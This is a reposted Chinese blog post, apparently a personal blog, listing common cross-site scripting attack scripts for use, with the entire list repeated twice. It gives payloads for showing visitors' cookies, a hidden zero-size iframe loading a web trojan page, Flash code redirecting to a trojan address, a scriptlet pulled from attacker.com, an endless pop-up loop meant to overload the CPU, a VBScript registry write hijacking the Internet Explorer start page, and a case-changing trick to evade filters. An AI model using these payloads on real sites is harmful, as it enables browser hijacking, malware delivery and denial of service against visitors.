[转载]XSS 攻擊常用腳本
1、這個應該都知道
<script>alert("test")</script> 常用于測試 是否存在跨站
2、<script>window.alert(document.cookie);</script>
這句代碼將會彈出壹個包含有浏覽者cookie信息的對話框,如果用戶已經通過帳號登陸網站,在顯示的cookie信息中將會包含有用戶的賬戶名和密碼。
3、<script>window.open('http://www.pete.cn /default.asp','newwindow','width=200,height=200');</script>,當用戶浏覽該 頁時,將彈出壹個高爲200,寬爲200的網頁窗口,在其中打開的頁面是http://www.pete.cn/default.asp
4、跨站攻擊的形式是多樣的,不僅可以在網頁中插入跨站腳本代碼,而且可以在flash文件中插入跨站腳本代碼,實現跨站攻擊。由于flash文件有較高 的安全性,用戶通常對flash文件的警惕性不夠,因此用flash文件進行跨站攻擊的成功率很高。如果將這個含有跨站腳本代碼的flash文件插入到網 頁中,例如制作成網頁banner或者廣告,那麽中招的用戶將更多。
flash跨站是通過在flash文件中插入動作腳本來實現的,通過在flash文件“幀”的“動作”中插入跨站腳本代碼來實現跨站攻擊,其實現方法入下:
首先運行flash文件制作工具flash8.exe,新建壹個空白的flash文檔。然後選中其中的第壹幀,進入界面下方的“動作”編輯界面,在Action Script中插入我們的跨站腳本代碼
getURL("http://網頁木馬地址", "_blank", "GET");
loadMovieNum("http://www.pete.cn/test.swf", 0);
5、<iframe src=http://www.***.com/muma.htm width=0 height=0>< iframe>
這就是 傳說中的框架 - - 膜拜吧 還有JS 也可以使用,比框架更隱蔽
6、Refresh到另壹個頁面:
<meta http-equiv="refresh" c>
7、scriptlet引入另壹個頁面:
<object type="text/x-scriptlet" data="http://www.attacker.com/import.htm"></object>
------------------------------------------------------------------------------------------------------------
下面來幾段長的 但是 記住 要慎用 !!
1、打開無數個浏覽器窗口,直至CPU超負荷,非關機不可:
<script language="JavaScript">
<!--
while (true)
{
window.open("URI"); //如果URI就是當前頁本身,那就更具破壞性。
}
//-->
</script>
2、
修改注冊表(IE 主頁):
<script language="VBScript">
Set RegWsh = CreateObject("WScript.Shell")
'設置IE浏覽器默認頁
RegWsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.attacker.com"
</script>
有時候,</script> 可以替換大小寫 來躲過過濾
<script>alert("test")</script> 常用于測試 是否存在跨站
2、<script>window.alert(document.cookie);</script>
這句代碼將會彈出壹個包含有浏覽者cookie信息的對話框,如果用戶已經通過帳號登陸網站,在顯示的cookie信息中將會包含有用戶的賬戶名和密碼。
3、<script>window.open('http://www.pete.cn /default.asp','newwindow','width=200,height=200');</script>,當用戶浏覽該 頁時,將彈出壹個高爲200,寬爲200的網頁窗口,在其中打開的頁面是http://www.pete.cn/default.asp
4、跨站攻擊的形式是多樣的,不僅可以在網頁中插入跨站腳本代碼,而且可以在flash文件中插入跨站腳本代碼,實現跨站攻擊。由于flash文件有較高 的安全性,用戶通常對flash文件的警惕性不夠,因此用flash文件進行跨站攻擊的成功率很高。如果將這個含有跨站腳本代碼的flash文件插入到網 頁中,例如制作成網頁banner或者廣告,那麽中招的用戶將更多。
flash跨站是通過在flash文件中插入動作腳本來實現的,通過在flash文件“幀”的“動作”中插入跨站腳本代碼來實現跨站攻擊,其實現方法入下:
首先運行flash文件制作工具flash8.exe,新建壹個空白的flash文檔。然後選中其中的第壹幀,進入界面下方的“動作”編輯界面,在Action Script中插入我們的跨站腳本代碼
getURL("http://網頁木馬地址", "_blank", "GET");
loadMovieNum("http://www.pete.cn/test.swf", 0);
5、<iframe src=http://www.***.com/muma.htm width=0 height=0>< iframe>
這就是 傳說中的框架 - - 膜拜吧 還有JS 也可以使用,比框架更隱蔽
6、Refresh到另壹個頁面:
<meta http-equiv="refresh" c>
7、scriptlet引入另壹個頁面:
<object type="text/x-scriptlet" data="http://www.attacker.com/import.htm"></object>
------------------------------------------------------------------------------------------------------------
下面來幾段長的 但是 記住 要慎用 !!
1、打開無數個浏覽器窗口,直至CPU超負荷,非關機不可:
<script language="JavaScript">
<!--
while (true)
{
window.open("URI"); //如果URI就是當前頁本身,那就更具破壞性。
}
//-->
</script>
2、
修改注冊表(IE 主頁):
<script language="VBScript">
Set RegWsh = CreateObject("WScript.Shell")
'設置IE浏覽器默認頁
RegWsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.attacker.com"
</script>
有時候,</script> 可以替換大小寫 來躲過過濾
---------------------------------------------------------------------------
低调的python小子
当梦想照进现实 幸福近在咫尺
[jpg]http://ip.ipwind.cn/msn.png[/jpg]
浙公网安备 33010602011771号